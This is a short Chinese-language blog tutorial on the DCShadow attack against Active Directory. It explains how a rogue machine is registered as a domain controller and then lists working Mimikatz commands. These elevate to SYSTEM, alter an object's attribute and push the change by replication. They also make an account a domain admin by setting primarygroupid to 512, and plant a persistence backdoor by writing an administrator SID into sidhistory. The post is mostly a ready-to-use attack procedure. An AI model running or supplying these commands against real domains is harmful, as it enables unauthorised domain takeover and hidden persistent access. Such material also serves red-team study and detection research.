DCShadow 攻击

地球胖头鱼 2021-01-11
Web安全 发布于 2021-01-11 14:49:07 阅读 92 评论 0

原理

Mimikatz远程从DC中复制数据,即Dcsync;类似的dcshadow可以伪装成DC,让正常DC通过伪造的DC中复制数据。

步骤

1、通过dcshadow更改配置架构和注册SPN值,将我们的服务器注册为Active Directory中的DC

2、在我们伪造的DC上更改数据,并利用域复制将数据同步到正常DC上。

首先加载mimikatz的驱动保证你在system权限下:

!+
!processtoken
token::whoami

更改属性描述值

lsadump::dcshadow /object:CN=dc,CN=Users,DC=test,DC=org /attribute:description /value:”xxxxxx”

然后新开一个窗口,以域管权限运行mimikatz:

lsadump::dcshadow /push

然后win7的描述就更改为了我们刚才定义的内容。

然后我们就可以使用下面的方法,添加域管:

lsadump::dcshadow /object:CN=win7,CN=Users,DC=test,DC=org /attribute:primarygroupid /value:512

或者是管理后门

lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:sidhistory /value:S-1-5-21-1900941692-2128706383-2830697502-500
本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
地球胖头鱼
未填写
  • 作者发布文章187
  • 作者收获粉丝7
  • 作者收到点赞0
  • 所有文章被收藏了1
  • 博客总访问量排行第2
  • 博客总访问量3.4 万(每日更新)
查看所有博文